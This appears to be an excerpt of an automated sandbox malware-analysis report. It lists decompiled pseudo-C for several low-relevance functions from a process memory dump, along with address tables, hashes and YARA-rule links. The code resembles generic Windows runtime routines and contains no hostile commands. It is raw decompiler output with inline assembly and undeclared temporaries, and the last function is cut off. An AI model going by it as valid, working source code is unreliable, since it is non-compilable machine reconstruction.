                                                        Uniqueness Score: -1.00%

                                                        Function 04856DC9, Relevance: .2, Instructions: 199COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 79%
                                                        			E04856DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L047F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E04856B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E047F7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E04819AE0();
					_t87 = L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0485795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0485795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0485795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0485795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L047F4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E04856B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E04856B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E04856B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E04856B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E047F7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E04819AE0();
								L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L047F2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L047F2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L047F2400( &_v52);
							}
							if(_v28 >= 0) {
								return L047F2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                                        0x04856dd4
                                                        0x04856dde
                                                        0x04856de1
                                                        0x04856de3
                                                        0x04856de6
                                                        0x04856de9
                                                        0x04856dec
                                                        0x04856def
                                                        0x04856df2
                                                        0x04856df5
                                                        0x04856dfe
                                                        0x04856e04
                                                        0x04856e09
                                                        0x04856e0d
                                                        0x04856e18
                                                        0x04856e1b
                                                        0x04856e22
                                                        0x04856e2d
                                                        0x04856e30
                                                        0x04856e36
                                                        0x04856e42
                                                        0x04856e4d
                                                        0x04856e50
                                                        0x04856e55
                                                        0x04856e5c
                                                        0x04856e6e
                                                        0x04856e5e
                                                        0x04856e67
                                                        0x04856e67
                                                        0x04856e73
                                                        0x04856e74
                                                        0x04856e77
                                                        0x04856e7c
                                                        0x04856e7d
                                                        0x04856e8e
                                                        0x04856e93
                                                        0x04856e9c
                                                        0x04856ea8
                                                        0x04856eab
                                                        0x04856eac
                                                        0x04856eb3
                                                        0x04856ecd
                                                        0x04856edc
                                                        0x04856ee2
                                                        0x04856ee5
                                                        0x04856ef2
                                                        0x04856efb
                                                        0x04856f01
                                                        0x04856f06
                                                        0x04856f0b
                                                        0x04856f11
                                                        0x04856f1a
                                                        0x04856f22
                                                        0x04856f26
                                                        0x04856f26
                                                        0x04856f33
                                                        0x04856f41
                                                        0x04856f44
                                                        0x04856f47
                                                        0x04856f54
                                                        0x04856f65
                                                        0x04856f77
                                                        0x04856f7c
                                                        0x04856f82
                                                        0x04856f91
                                                        0x04856f99
                                                        0x04856fa3
                                                        0x04856fae
                                                        0x04856fae
                                                        0x04856fba
                                                        0x04856fbb
                                                        0x04856fbc
                                                        0x04856fc1
                                                        0x04856fc2
                                                        0x04856fd3
                                                        0x04856fd8
                                                        0x04856fd8
                                                        0x04856fdf
                                                        0x04856fe8
                                                        0x04856fee
                                                        0x04856fee
                                                        0x04856ff5
                                                        0x04856ffb
                                                        0x04856ffb
                                                        0x04857004
                                                        0x00000000
                                                        0x0485700a
                                                        0x04857004
                                                        0x04856eb3
                                                        0x04856e9c
                                                        0x04857015

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                        • Instruction ID: 81d1a6178849d21c906ec957837b9a832bd679c8903fadf2986a3b40ca515477
                                                        • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                        • Instruction Fuzzy Hash: 06717F71E00219AFDB11DFA8C944AEEBBB9FF48714F104569E904E7350E774BA41CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047D52A5, Relevance: .2, Instructions: 161COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 80%
                                                        			E047D52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E047EEEF0(0x48c79a0);
					_t104 =  *0x48c8210; // 0x661cd0
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					_t2 = _t104 + 8; // 0x28000000
					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
					E047EEB70(_t93, 0x48c79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_t10 = _t104 + 4; // 0x0
							_push( *_t10);
							_t53 = E04819890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E047EEEF0(0x48c79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E047EEB70(0, 0x48c79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t11 = _t104 + 0xe; // 0x661ce802
								_t13 = _t104 + 0xc; // 0x661cdd
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0480F0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E047EEEF0(0x48c79a0);
									__eflags =  *0x48c8210 - _t104; // 0x661cd0
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x48c8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t37 = _t104 + 0x10; // 0x2000661c
											_t95 =  *((intOrPtr*)( *_t37));
											E04854888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
										}
										E047EEB70(_t95, 0x48c79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_t38 = _t104 + 4; // 0x0
											_push( *_t38);
											E048195D0();
											L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_t41 = _t104 + 4; // 0x0
											_push( *_t41);
											E048195D0();
											L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E047EEB70(_t93, 0x48c79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_t25 = _t104 + 4; // 0x0
										_push( *_t25);
										E048195D0();
										L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E048195D0();
										L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t15 = _t104 + 0x10; // 0x2000661c
								_t93 =  &_v20;
								_t17 = _t104 + 0xe; // 0x661ce802
								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0480F0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                        0x047d52a5
                                                        0x047d52ad
                                                        0x047d52b0
                                                        0x047d52b3
                                                        0x047d52b7
                                                        0x047d52ba
                                                        0x047d52bf
                                                        0x047d52c4
                                                        0x047d52cc
                                                        0x00000000
                                                        0x00000000
                                                        0x047d52ce
                                                        0x047d52d1
                                                        0x047d52d9
                                                        0x047d52dd
                                                        0x047d52e7
                                                        0x047d52f7
                                                        0x047d52f9
                                                        0x047d52fd
                                                        0x04830dcf
                                                        0x04830dd5
                                                        0x04830dd6
                                                        0x04830dd7
                                                        0x04830dd8
                                                        0x04830dd9
                                                        0x04830dde
                                                        0x04830ddf
                                                        0x04830de0
                                                        0x04830de1
                                                        0x04830de2
                                                        0x04830de2
                                                        0x04830de5
                                                        0x04830dea
                                                        0x04830dec
                                                        0x04830f60
                                                        0x04830f64
                                                        0x04830f70
                                                        0x04830f76
                                                        0x04830f79
                                                        0x04830f79
                                                        0x00000000
                                                        0x04830f64
                                                        0x04830df2
                                                        0x04830df7
                                                        0x04830e04
                                                        0x04830e04
                                                        0x04830e0d
                                                        0x04830e0d
                                                        0x04830e10
                                                        0x04830e1a
                                                        0x04830e1c
                                                        0x04830e4c
                                                        0x04830e52
                                                        0x04830e61
                                                        0x04830e67
                                                        0x04830e6b
                                                        0x04830e70
                                                        0x04830e76
                                                        0x04830ed7
                                                        0x04830edc
                                                        0x04830ee0
                                                        0x04830ee6
                                                        0x04830eea
                                                        0x04830eed
                                                        0x04830ef0
                                                        0x04830ef3
                                                        0x04830ef6
                                                        0x04830ef9
                                                        0x04830efb
                                                        0x04830efe
                                                        0x04830f01
                                                        0x04830f01
                                                        0x04830f0b
                                                        0x04830f12
                                                        0x04830f16
                                                        0x04830f18
                                                        0x04830f18
                                                        0x04830f1b
                                                        0x04830f2c
                                                        0x04830f31
                                                        0x04830f31
                                                        0x04830f35
                                                        0x04830f39
                                                        0x04830f3a
                                                        0x04830f3c
                                                        0x04830f3c
                                                        0x04830f3f
                                                        0x04830f50
                                                        0x04830f55
                                                        0x04830f55
                                                        0x04830f59
                                                        0x047d52eb
                                                        0x047d52f1
                                                        0x047d52f1
                                                        0x04830e7d
                                                        0x04830e84
                                                        0x04830e88
                                                        0x04830e8a
                                                        0x04830e8a
                                                        0x04830e8d
                                                        0x04830e9e
                                                        0x04830ea3
                                                        0x04830ea3
                                                        0x04830ea7
                                                        0x04830eaf
                                                        0x04830eb3
                                                        0x04830eb9
                                                        0x04830eb9
                                                        0x04830ebc
                                                        0x04830ecd
                                                        0x04830ecd
                                                        0x00000000
                                                        0x04830eb3
                                                        0x04830e1e
                                                        0x04830e21
                                                        0x04830e25
                                                        0x04830e2b
                                                        0x04830e2f
                                                        0x04830e30
                                                        0x04830e3a
                                                        0x04830e3f
                                                        0x04830e41
                                                        0x00000000
                                                        0x00000000
                                                        0x04830e47
                                                        0x00000000
                                                        0x04830e47
                                                        0x04830df9
                                                        0x04830dfe
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x04830dfe
                                                        0x047d5303
                                                        0x047d5307
                                                        0x00000000
                                                        0x047d5309
                                                        0x00000000
                                                        0x047d5309
                                                        0x047d5307
                                                        0x047d52e9
                                                        0x047d52e9
                                                        0x00000000
                                                        0x047d52e9
                                                        0x047d530e
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 05a6417119182b7033a6d00818ed140c5d9134544cad7c66117af26cc7706334
                                                        • Instruction ID: 0aa108761182baed2effb7249e1584de8455bd0f6d4dc71135e3c4a38464b51f
                                                        • Opcode Fuzzy Hash: 05a6417119182b7033a6d00818ed140c5d9134544cad7c66117af26cc7706334
                                                        • Instruction Fuzzy Hash: D75197B1215742ABE321EF28C944B27BBE8FF44718F144E1AE59587750E7B4F848CB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047FDBE9, Relevance: .1, Instructions: 149COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 86%
                                                        			E047FDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E047DCC50(E047D4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E047F7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E048A8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E047F2280(_t58, _v44);
						E047FDD82(_v44, _t102, _t98);
						E047FB944(_t102, _v5);
						return E047EFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x48c8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x48c862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x48c8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x48c862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x489fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                                        0x047fdbe9
                                                        0x047fdbf2
                                                        0x047fdbf7
                                                        0x047fdbf9
                                                        0x047fdbfc
                                                        0x047fdc00
                                                        0x047fdc03
                                                        0x047fdc14
                                                        0x047fdd54
                                                        0x047fdd54
                                                        0x047fdd54
                                                        0x047fdc18
                                                        0x047fdc1d
                                                        0x047fdc1d
                                                        0x047fdc32
                                                        0x047fdc3b
                                                        0x047fdc3e
                                                        0x047fdc46
                                                        0x047fdd5b
                                                        0x047fdd62
                                                        0x047fdd64
                                                        0x047fdd67
                                                        0x047fdd69
                                                        0x047fdd6b
                                                        0x047fdd6e
                                                        0x047fdd70
                                                        0x047fdd73
                                                        0x047fdd73
                                                        0x00000000
                                                        0x047fdc4c
                                                        0x047fdc4e
                                                        0x04843ae3
                                                        0x04843ae8
                                                        0x04843aea
                                                        0x047fdce7
                                                        0x047fdce9
                                                        0x047fdcec
                                                        0x047fdcee
                                                        0x047fdcf0
                                                        0x047fdcf3
                                                        0x047fdcf5
                                                        0x04843af2
                                                        0x04843af5
                                                        0x04843af5
                                                        0x047fdd06
                                                        0x047fdd08
                                                        0x047fdd0b
                                                        0x047fdd12
                                                        0x04843b08
                                                        0x047fdd18
                                                        0x047fdd18
                                                        0x047fdd18
                                                        0x047fdd20
                                                        0x047fdd23
                                                        0x04843b16
                                                        0x04843b16
                                                        0x047fdd29
                                                        0x047fdd2d
                                                        0x047fdd36
                                                        0x047fdd40
                                                        0x047fdd51
                                                        0x047fdd51
                                                        0x047fdc54
                                                        0x047fdc59
                                                        0x047fdc59
                                                        0x047fdc5e
                                                        0x047fdc5e
                                                        0x047fdc63
                                                        0x047fdc66
                                                        0x047fdc6b
                                                        0x047fdc78
                                                        0x047fdc7b
                                                        0x047fdc81
                                                        0x047fdc81
                                                        0x047fdc83
                                                        0x047fdc89
                                                        0x00000000
                                                        0x00000000
                                                        0x047fdd7b
                                                        0x047fdd7b
                                                        0x047fdc8f
                                                        0x047fdc8f
                                                        0x047fdc92
                                                        0x047fdc99
                                                        0x047fdc9f
                                                        0x047fdca5
                                                        0x047fdcaa
                                                        0x047fdcaa
                                                        0x047fdcb3
                                                        0x047fdcb8
                                                        0x047fdcbb
                                                        0x047fdcc1
                                                        0x047fdccf
                                                        0x047fdcd2
                                                        0x047fdcd5
                                                        0x047fdcd7
                                                        0x047fdcda
                                                        0x047fdcdc
                                                        0x047fdcdc
                                                        0x047fdce2
                                                        0x047fdce4
                                                        0x00000000
                                                        0x047fdce4

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f2c4cfffd13a920db67247ea7e14ca78c1b05363a241abea57b92fa913237e48
                                                        • Instruction ID: a444c7d2c1837729e4a225e035393a1734c2b87cecbd2148d89b55cc6fb1e3e1
                                                        • Opcode Fuzzy Hash: f2c4cfffd13a920db67247ea7e14ca78c1b05363a241abea57b92fa913237e48
                                                        • Instruction Fuzzy Hash: A3518F71A01615DFCB24DF68C880AAEBBF1FB48314F21855ADA56E7344EB71B944CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047EEF40, Relevance: .1, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 96%
                                                        			E047EEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E047D9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x772ac21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E047D2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                        0x047eef4b
                                                        0x047eef4d
                                                        0x047eef57
                                                        0x047ef0bd
                                                        0x047ef0c2
                                                        0x047ef0d2
                                                        0x047ef0d2
                                                        0x047ef0c2
                                                        0x047eef5d
                                                        0x047eef5f
                                                        0x047eef67
                                                        0x047eef6a
                                                        0x047eef6d
                                                        0x047eef74
                                                        0x047eef7f
                                                        0x047eef82
                                                        0x047eef82
                                                        0x047eef86
                                                        0x047eef88
                                                        0x047eef8c
                                                        0x047eef8f
                                                        0x047eef8f
                                                        0x047eef8f
                                                        0x00000000
                                                        0x047eef91
                                                        0x047eef93
                                                        0x047eefc4
                                                        0x047eefc4
                                                        0x047eefc4
                                                        0x047eefca
                                                        0x047eefd0
                                                        0x047ef0a6
                                                        0x00000000
                                                        0x00000000
                                                        0x047ef0af
                                                        0x0483bb06
                                                        0x0483bb0a
                                                        0x047ef0b5
                                                        0x047ef0b5
                                                        0x047ef0b5
                                                        0x047ef0b5
                                                        0x00000000
                                                        0x047eefd6
                                                        0x047eefd9
                                                        0x047ef0de
                                                        0x047ef0e2
                                                        0x047eefdf
                                                        0x047eefdf
                                                        0x047eefdf
                                                        0x047eefe5
                                                        0x0483bafc
                                                        0x0483bafc
                                                        0x047eefe5
                                                        0x047eefeb
                                                        0x047eefed
                                                        0x047ef00f
                                                        0x047ef011
                                                        0x047ef01a
                                                        0x047ef01d
                                                        0x047ef021
                                                        0x047ef028
                                                        0x047ef029
                                                        0x047ef029
                                                        0x047ef02c
                                                        0x00000000
                                                        0x047ef02c
                                                        0x047eeff3
                                                        0x047eeff9
                                                        0x047ef0ea
                                                        0x047ef0ed
                                                        0x047ef0ef
                                                        0x00000000
                                                        0x047ef0ef
                                                        0x047ef003
                                                        0x0483bb12
                                                        0x047ef045
                                                        0x047ef049
                                                        0x047ef051
                                                        0x047ef09e
